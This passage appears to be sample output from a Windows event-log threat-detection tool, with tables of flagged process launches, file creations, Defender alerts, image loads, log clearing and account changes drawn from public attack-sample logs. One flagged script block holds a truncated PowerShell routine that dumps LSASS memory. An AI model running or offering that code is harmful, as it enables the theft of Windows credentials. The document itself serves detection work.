βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2021-01-26 13:21:14 β 1 β β£ Non Interactive PowerShell β "LAPTOP-JU4M3I0E" β C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powersh β powershell.exe start-process notepad.exe β
β β β β β ell.exe β β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2021-04-20 20:32:55 β 1 β β£ Non Interactive PowerShell β "MSEDGEWIN10" β C:\Windows\System32\WindowsPowerShell\v1.0\powersh β "C:\Windows\System32\WindowsPowerShell\v1.0\powers β
β β β β β ell.exe β hell.exe" -Version 5.1 -s -NoLogo -NoProfile β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2021-04-20 20:33:13 β 1 β β£ Suspicious Svchost Process β "MSEDGEWIN10" β C:\Windows\System32\svchost.exe β C:\Windows\system32\svchost.exe -k netsvcs -p -s g β
β β β β£ Windows Processes Suspicious β β β psvc β
β β β Parent Directory β β β β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2021-04-20 20:33:14 β 1 β β£ Suspicious Svchost Process β "MSEDGEWIN10" β C:\Windows\System32\svchost.exe β C:\Windows\system32\svchost.exe -k LocalService -p β
β β β β£ Windows Processes Suspicious β β β -s fdPHost β
β β β Parent Directory β β β β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2021-04-22 22:09:26 β 1 β β£ Windows Processes Suspicious β "MSEDGEWIN10" β C:\Windows\System32\services.exe β C:\Windows\system32\services.exe 652 "lsass.dmp" a β
β β β Parent Directory β β β 708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2021-04-22 22:09:35 β 1 β β£ Suspicious Svchost Process β "MSEDGEWIN10" β C:\Windows\System32\svchost.exe β C:\Windows\system32\svchost.exe -k LocalService -p β
β β β β£ Windows Processes Suspicious β β β -s fdPHost β
β β β Parent Directory β β β β
βββββββββββββββββββββββ΄βββββ΄βββββββββββββββββββββββββββββββββββββββββββ΄βββββββββββββββββββββββββββββββββ΄βββββββββββββββββββββββββββββββββββββββββββββββββββββ΄βββββββββββββββββββββββββββββββββββββββββββββββββββββ
[+] Detection: Suspicious File Creation
βββββββββββββββββββββββ¬βββββ¬βββββββββββββββββββββββββββββββββ¬βββββββββββββββββββββββββββββ¬βββββββββββββββββββββββββββββββββββββββββββββββββββββ¬βββββββββββββββββββββββββββββββββββββββββββββββββββββ
β system_time β id β detection_rules β computer_name β Event.EventData.TargetFilename β image β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2019-05-14 14:04:05 β 11 β β£ Hijack Legit RDP Session β "alice.insecurebank.local" β C:\Users\administrator\AppData\Roaming\Microsoft\W β C:\Windows\system32\mstsc.exe β
β β β to Move Laterally β β indows\Start Menu\Programs\Startup\cmd.exe β β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2019-07-19 14:45:31 β 11 β β£ Startup Folder File Write β "MSEDGEWIN10" β C:\ProgramData\Microsoft\Windows\Start Menu\Progra β C:\Windows\System32\WindowsPowerShell\v1.0\powersh β
β β β β β ms\StartUp\Notepad.lnk β ell.exe β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2020-02-10 08:28:12 β 11 β β£ Execution from Suspicious β "MSEDGEWIN10" β C:\Windows\System32\drivers\VBoxDrv.sys β c:\Users\Public\BYOV\TDL\Furutaka.exe β
β β β Folder β β β β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2020-07-03 08:47:21 β 11 β β£ Suspicious Desktopimgdownldr β "MSEDGEWIN10" β C:\Users\IEUser\AppData\Local\Temp\Personalization β C:\Windows\System32\svchost.exe β
β β β Target File β β \LockScreenImage\LockScreenImage_uXQ8IiHL80mkJsKc3 β β
β β β β β 19JaA.7z β β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2020-10-17 11:43:33 β 11 β β£ Execution from Suspicious β "MSEDGEWIN10" β C:\Users\IEUser\AppData\Roaming\WINWORD.exe β C:\Users\Public\tools\apt\wwlib\test.exe β
β β β Folder β β β β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2020-10-17 11:43:33 β 11 β β£ Execution from Suspicious β "MSEDGEWIN10" β C:\Users\IEUser\AppData\Roaming\wwlib.dll β C:\Users\Public\tools\apt\wwlib\test.exe β
β β β Folder β β β β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2020-10-23 21:57:34 β 11 β β£ Execution from Suspicious β "MSEDGEWIN10" β C:\Users\IEUser\AppData\Local\Temp\tmp1375\__tmp_r β c:\Users\Public\test.tmp β
β β β Folder β β ar_sfx_access_check_2914968 β β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2020-10-23 21:57:34 β 11 β β£ Execution from Suspicious β "MSEDGEWIN10" β C:\Users\IEUser\AppData\Local\Temp\tmp1375\d948 β c:\Users\Public\test.tmp β
β β β Folder β β β β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2020-11-26 17:38:11 β 11 β β£ Execution from Suspicious β "LAPTOP-JU4M3I0E" β C:\Users\Public\tools\privesc\uac\system32\npmprox β C:\Users\Public\tools\privesc\uac\byeintegrity5-ua β
β β β Folder β β y.dll β c.exe β
βββββββββββββββββββββββ΄βββββ΄βββββββββββββββββββββββββββββββββ΄βββββββββββββββββββββββββββββ΄βββββββββββββββββββββββββββββββββββββββββββββββββββββ΄βββββββββββββββββββββββββββββββββββββββββββββββββββββ
[+] Detection: Windows Defender Detections
βββββββββββββββββββββββ¬βββββββ¬ββββββββββββββββ¬ββββββββββββββββββββββββββββββββββββ¬βββββββββββββββββββββββββββββββββββββββββββββββββββββ¬ββββββββββββββββββββββββ
β system_time β id β computer β threat_name β threat_file β user β
βββββββββββββββββββββββΌβββββββΌββββββββββββββββΌββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌββββββββββββββββββββββββ€
β 2019-07-18 20:40:00 β 1116 β "MSEDGEWIN10" β "Trojan:PowerShell/Powersploit.M" β "file:_C:\\AtomicRedTeam\\atomic-red-team-master\\ β "MSEDGEWIN10\\IEUser" β
β β β β β atomics\\T1056\\Get-Keystrokes.ps1" β β
βββββββββββββββββββββββΌβββββββΌββββββββββββββββΌββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌββββββββββββββββββββββββ€
β 2019-07-18 20:40:16 β 1116 β "MSEDGEWIN10" β "Trojan:XML/Exeselrun.gen!A" β "file:_C:\\AtomicRedTeam\\atomic-red-team-master\\ β "MSEDGEWIN10\\IEUser" β
β β β β β atomics\\T1086\\payloads\\test.xsl" β β
βββββββββββββββββββββββΌβββββββΌββββββββββββββββΌββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌββββββββββββββββββββββββ€
β 2019-07-18 20:41:16 β 1116 β "MSEDGEWIN10" β "HackTool:JS/Jsprat" β "file:_C:\\AtomicRedTeam\\atomic-red-team-master\\ β "MSEDGEWIN10\\IEUser" β
β β β β β atomics\\T1100\\shells\\b.jsp->(SCRIPT0005)" β β
βββββββββββββββββββββββΌβββββββΌββββββββββββββββΌββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌββββββββββββββββββββββββ€
β 2019-07-18 20:41:17 β 1116 β "MSEDGEWIN10" β "Backdoor:ASP/Ace.T" β "file:_C:\\AtomicRedTeam\\atomic-red-team-master\\ β "MSEDGEWIN10\\IEUser" β
β β β β β atomics\\T1100\\shells\\cmd.aspx" β β
βββββββββββββββββββββββΌβββββββΌββββββββββββββββΌββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌββββββββββββββββββββββββ€
β 2019-07-18 20:41:48 β 1116 β "MSEDGEWIN10" β "Trojan:Win32/Sehyioa.A!cl" β "file:_C:\\AtomicRedTeam\\atomic-red-team-master\\ β "MSEDGEWIN10\\IEUser" β
β β β β β atomics\\T1218\\src\\Win32\\T1218-2.dll" β β
βββββββββββββββββββββββΌβββββββΌββββββββββββββββΌββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌββββββββββββββββββββββββ€
β 2019-07-18 20:51:50 β 1116 β "MSEDGEWIN10" β "HackTool:JS/Jsprat" β "containerfile:_C:\\AtomicRedTeam\\atomic-red-team β "MSEDGEWIN10\\IEUser" β
β β β β β -master\\atomics\\T1100\\shells\\b.jsp; file:_C:\\ β β
β β β β β AtomicRedTeam\\atomic-red-team-master\\atomics\\T1 β β
β β β β β 100\\shells\\b.jsp->(SCRIPT0005); file:_C:\\Atomic β β
β β β β β RedTeam\\atomic-red-team-master\\atomics\\T1100\\s β β
β β β β β hells\\b.jsp->(SCRIPT0037); file:_C:\\AtomicRedTea β β
β β β β β m\\atomic-red-team-master\\atomics\\T1100\\shells\ β β
β β β β β \b.jsp->(SCRIPT0045); file:_C:\\AtomicRedTeam\\ato β β
β β β β β mic-red-team-master\\atomics\\T1100\\shells\\b.jsp β β
β β β β β ->(SCRIPT0065); file:_C:\\AtomicRedTeam\\atomic-re β β
β β β β β d-team-master\\atomics\\T1100\\shells\\b.jsp->(SCR β β
β β β β β IPT0068)" β β
βββββββββββββββββββββββ΄βββββββ΄ββββββββββββββββ΄ββββββββββββββββββββββββββββββββββββ΄βββββββββββββββββββββββββββββββββββββββββββββββββββββ΄ββββββββββββββββββββββββ
[+] Detection: Suspicious Image Load
βββββββββββββββββββββββ¬βββββ¬ββββββββββββββββββββββββββββββ¬ββββββββββββββββ¬βββββββββββββββββββββββββββββββββββββββββββββββββββββ¬βββββββββββββββββββββββββββββββββββββββββββββββββββββ
β system_time β id β detection_rules β computer_name β Event.EventData.Image β image_loaded β
βββββββββββββββββββββββΌβββββΌββββββββββββββββββββββββββββββΌββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2019-04-27 18:47:00 β 7 β β£ Execution from Suspicious β "IEWIN7" β C:\Users\Public\KeeFarce.exe β C:\Users\Public\BootstrapDLL.dll β
β β β Folder β β β β
βββββββββββββββββββββββΌβββββΌββββββββββββββββββββββββββββββΌββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2019-05-18 17:16:18 β 7 β β£ In-memory PowerShell β "IEWIN7" β C:\Windows\System32\notepad.exe β C:\Windows\assembly\NativeImages_v2.0.50727_32\Sys β
β β β β β β tem.Management.A#\4b93b6bd71723bed2fa9dd778436dd5e β
β β β β β β \System.Management.Automation.ni.dll β
βββββββββββββββββββββββΌβββββΌββββββββββββββββββββββββββββββΌββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2019-05-23 17:26:08 β 7 β β£ XSL Script Processing β "IEWIN7" β \\vboxsrv\HTools\msxsl.exe β C:\Windows\System32\msxml3.dll β
βββββββββββββββββββββββΌβββββΌββββββββββββββββββββββββββββββΌββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2019-06-14 22:22:31 β 7 β β£ WMI Modules Loaded β "IEWIN7" β C:\Users\IEUser\Downloads\a.exe β C:\Windows\System32\wbem\wmiutils.dll β
βββββββββββββββββββββββΌβββββΌββββββββββββββββββββββββββββββΌββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2019-06-14 22:23:26 β 7 β β£ WMI Modules Loaded β "IEWIN7" β C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\B β C:\Windows\System32\wbem\wmiutils.dll β
β β β β β RE6BgE2JubB.exe β β
βββββββββββββββββββββββΌβββββΌββββββββββββββββββββββββββββββΌββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2019-08-30 12:54:08 β 7 β β£ WMI Modules Loaded β "MSEDGEWIN10" β C:\Windows\System32\cscript.exe β C:\Windows\System32\wbem\wmiutils.dll β
βββββββββββββββββββββββΌβββββΌββββββββββββββββββββββββββββββΌββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2020-08-02 16:24:07 β 7 β β£ Fax Service DLL Search β "MSEDGEWIN10" β C:\Windows\System32\FXSSVC.exe β C:\Windows\System32\Ualapi.dll β
β β β Order Hijack β β β β
βββββββββββββββββββββββΌβββββΌββββββββββββββββββββββββββββββΌββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2020-10-15 13:17:02 β 7 β β£ Execution from Suspicious β "MSEDGEWIN10" β C:\Users\Public\tools\apt\tendyron.exe β C:\Users\Public\tools\apt\OnKeyToken_KEB.dll β
β β β Folder β β β β
βββββββββββββββββββββββΌβββββΌββββββββββββββββββββββββββββββΌββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2020-10-17 11:43:28 β 7 β β£ Execution from Suspicious β "MSEDGEWIN10" β C:\Users\Public\tools\apt\wwlib\test.exe β C:\Users\Public\tools\apt\wwlib\wwlib.dll β
β β β Folder β β β β
βββββββββββββββββββββββΌβββββΌββββββββββββββββββββββββββββββΌββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2020-10-17 11:43:28 β 7 β β£ Execution from Suspicious β "MSEDGEWIN10" β C:\Users\Public\tools\apt\wwlib\test.exe β C:\Users\Public\tools\apt\wwlib\wwlib.dll β
β β β Folder β β β β
βββββββββββββββββββββββΌβββββΌββββββββββββββββββββββββββββββΌββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2020-10-17 11:43:31 β 7 β β£ Execution from Suspicious β "MSEDGEWIN10" β C:\Users\Public\tools\apt\wwlib\test.exe β C:\Users\Public\tools\apt\wwlib\wwlib.dll β
β β β Folder β β β β
βββββββββββββββββββββββΌβββββΌββββββββββββββββββββββββββββββΌββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2020-10-17 11:43:31 β 7 β β£ Execution from Suspicious β "MSEDGEWIN10" β C:\Users\Public\tools\apt\wwlib\test.exe β C:\Users\Public\tools\apt\wwlib\wwlib.dll β
β β β Folder β β β β
βββββββββββββββββββββββ΄βββββ΄ββββββββββββββββββββββββββββββ΄ββββββββββββββββ΄βββββββββββββββββββββββββββββββββββββββββββββββββββββ΄βββββββββββββββββββββββββββββββββββββββββββββββββββββ
[+] Detection: Suspicious Powershell ScriptBlock
βββββββββββββββββββββββ¬βββββββ¬βββββββββββββββββββββββββββ¬ββββββββββββββββ¬βββββββββββββββββββββββββββββββββββββββββββββββββββββ
β system_time β id β detection_rules β computer_name β Event.EventData.ScriptBlockText β
βββββββββββββββββββββββΌβββββββΌβββββββββββββββββββββββββββΌββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2020-06-30 14:24:08 β 4104 β β£ PowerShell Get-Process β "MSEDGEWIN10" β function Memory($path){ $Process = Get-Process ls β
β β β LSASS in ScriptBlock β β ass$DumpFilePath = $path$WER = [PSObject].Assembly β
β β β β β .GetType('System.Management.Automation.WindowsErro β
β β β β β rReporting')$WERNativeMethods = $WER.GetNestedType β
β β β β β ('NativeMethods', 'NonPublic')$Flags = [Reflection β
β β β β β .BindingFlags] 'NonPublic, Static'$MiniDumpWriteDu β
β β β β β mp = $WERNativeMethods.GetMethod('MiniDumpWriteDum β
β β β β β p', $Flags)$MiniDumpWithFullMemory = [UInt32] 2 #$ β
β β β β β ProcessId = $Process.Id$ProcessName = $Process.Nam β
β β β β β e$ProcessHandle = $Process.Handle$ProcessFileName β
β β β β β = "$($ProcessName).dmp"$ProcessDumpPath = Join-Pat β
β β β β β h $DumpFilePath $ProcessFileName$FileStream = New- β
β β β β β Object IO.FileStream($ProcessDumpPath, [IO.FileMod β
β β β β β e]::Create) $Result = $MiniDumpWriteDump.Invoke($n β
β β β β β ull, @($ProcessHandle,$ProcessId,$FileStream.SafeF β
β β β β β ileHandle,$MiniDumpWithFullMemory,[IntPtr]::Zero,[ β
β β β β β IntPtr]::Zero,[IntPtr]::Zero)) $FileStream.Close() β
β β β β β if (-not $Result){$Exception = New-Object Componen β
β β β β β tModel.Win32Exception$ExceptionMessage = "$($Excep β
β β β β β tion.Message) ($($ProcessName):... β
β β β β β β
β β β β β (use --full to show all content) β
βββββββββββββββββββββββ΄βββββββ΄βββββββββββββββββββββββββββ΄ββββββββββββββββ΄βββββββββββββββββββββββββββββββββββββββββββββββββββββ
[+] Detection: System log was cleared
βββββββββββββββββββββββ¬ββββββ¬ββββββββββββββββββββββββββββββββββββ¬βββββββββββββββ
β system_time β id β computer β subject_user β
βββββββββββββββββββββββΌββββββΌββββββββββββββββββββββββββββββββββββΌβββββββββββββββ€
β 2019-03-19 23:34:25 β 104 β "PC01.example.corp" β "user01" β
βββββββββββββββββββββββΌββββββΌββββββββββββββββββββββββββββββββββββΌβββββββββββββββ€
β 2020-09-15 19:28:31 β 104 β "01566s-win16-ir.threebeesco.com" β "a-jbrown" β
βββββββββββββββββββββββ΄ββββββ΄ββββββββββββββββββββββββββββββββββββ΄βββββββββββββββ
[+] Detection: New User Created
βββββββββββββββββββββββ¬βββββββ¬ββββββββββββββββββββββββββββββββββββ¬ββββββββββββββββββ¬βββββββββββββββββββββββββββββββββββββββββββββββββββ
β system_time β id β computer β target_username β user_sid β
βββββββββββββββββββββββΌβββββββΌββββββββββββββββββββββββββββββββββββΌββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2020-09-16 09:31:19 β 4720 β "01566s-win16-ir.threebeesco.com" β "$" β "S-1-5-21-308926384-506822093-3341789130-107103" β
βββββββββββββββββββββββΌβββββββΌββββββββββββββββββββββββββββββββββββΌββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2020-09-16 09:32:13 β 4720 β "01566s-win16-ir.threebeesco.com" β "$" β "S-1-5-21-308926384-506822093-3341789130-107104" β
βββββββββββββββββββββββ΄βββββββ΄ββββββββββββββββββββββββββββββββββββ΄ββββββββββββββββββ΄βββββββββββββββββββββββββββββββββββββββββββββββββββ
[+] Detection: User added to interesting group
βββββββββββββββββββββββ¬βββββββ¬ββββββββββββββββ¬ββββββββββββββββββββββββββββ¬ββββββββββββββββββββββββββββββββββββββββββββββββββ¬βββββββββββββββββββ
β system_time β id β computer β change_type β user_sid β target_group β
βββββββββββββββββββββββΌβββββββΌββββββββββββββββΌββββββββββββββββββββββββββββΌββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββ€
β 2019-09-22 11:22:05 β 4732 β "MSEDGEWIN10" β User added to local group β "S-1-5-21-3461203602-4096304019-2269080069-501" β "Administrators" β
βββββββββββββββββββββββΌβββββββΌββββββββββββββββΌββββββββββββββββββββββββββββΌββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββ€
β 2019-09-22 11:23:19 β 4732 β "MSEDGEWIN10" β User added to local group β "S-1-5-20" β "Administrators" β
βββββββββββββββββββββββ΄βββββββ΄ββββββββββββββββ΄ββββββββββββββββββββββββββββ΄ββββββββββββββββββββββββββββββββββββββββββββββββββ΄βββββββββββββββββββ
- EVTX-ATTACK-SAMPLES by SBousseaden
- Sigma detection rules
- EVTX parser library by @OBenamram
- TAU Engine Library by @AlexKornitzer